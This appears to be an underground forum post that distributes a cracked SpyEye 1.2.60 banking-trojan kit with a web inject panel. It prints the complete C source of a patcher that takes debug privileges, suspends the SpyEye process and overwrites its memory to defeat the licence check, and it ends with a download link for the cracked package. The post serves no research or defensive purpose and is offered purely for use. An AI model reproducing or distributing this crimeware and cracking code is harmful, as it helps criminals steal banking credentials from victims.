SpyEye 1.2.60 cracked + web inject panel
http://4.bp.blogspot.com/_B__eoAM-jD...0/spypwned.PNG
the crack is included and compiled, and here is the source code :
Code:
#include <Windows.h>
#include <tlhelp32.h>
typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle );
typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle );
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
TOKEN_PRIVILEGES priv;
HANDLE hThis, hToken;
LUID luid;
hThis = GetCurrentProcess();
OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
LookupPrivilegeValue(0, "seDebugPrivilege", &luid);
priv.PrivilegeCount = 1;
priv.Privileges[0].Luid = luid;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0);
CloseHandle(hToken);
CloseHandle(hThis);
HANDLE ProcessHandle = 0;
_NtSuspendProcess NtSuspendProcess = 0;
_NtResumeProcess NtResumeProcess = 0;
PROCESSENTRY32 processInfo;
processInfo.dwSize = sizeof(processInfo);
HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
CHAR processName[] = "SpyEye.exe";
DWORD PID = 0 ;
DWORD Patch1 = 0x4010CE;
DWORD Patch2 = 0x4010D3;
DWORD Patch3 = 0x4010D5;
DWORD Patch4 = 0x4010D6;
UCHAR PatchVal1[] = "\xB8\x12\x11\x40\x00";
UCHAR PatchVal2[] = "\xFF\xD0";
UCHAR PatchVal3[] = "\x90";
UCHAR PatchVal4[] = "\x90";
NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" );
NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" );
if ( processesSnapshot == INVALID_HANDLE_VALUE ){
return 0;
}
Process32First(processesSnapshot, &processInfo);
while ( Process32Next(processesSnapshot, &processInfo)){
if ( !strcmp(processName,processInfo.szExeFile)){
CloseHandle(processesSnapshot);
PID = processInfo.th32ProcessID;
break;
}
}
if(PID != NULL){
//MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0);
ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID);
}
if ( ProcessHandle != NULL ){
NtSuspendProcess( ProcessHandle );
WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL);
WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL);
/*
004010CE B8 12114000 MOV EAX,SpyEye_1.00401112
004010D3 FFD0 CALL EAX
004010D5 90 NOP
004010D6 90 NOP
*/
MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0);
NtResumeProcess( ProcessHandle );
CloseHandle(ProcessHandle);
}
return 0;
}
Download :
http://www.mediafire.com/?hyfz3cjnutiq1ux
enjoy and say thanks :)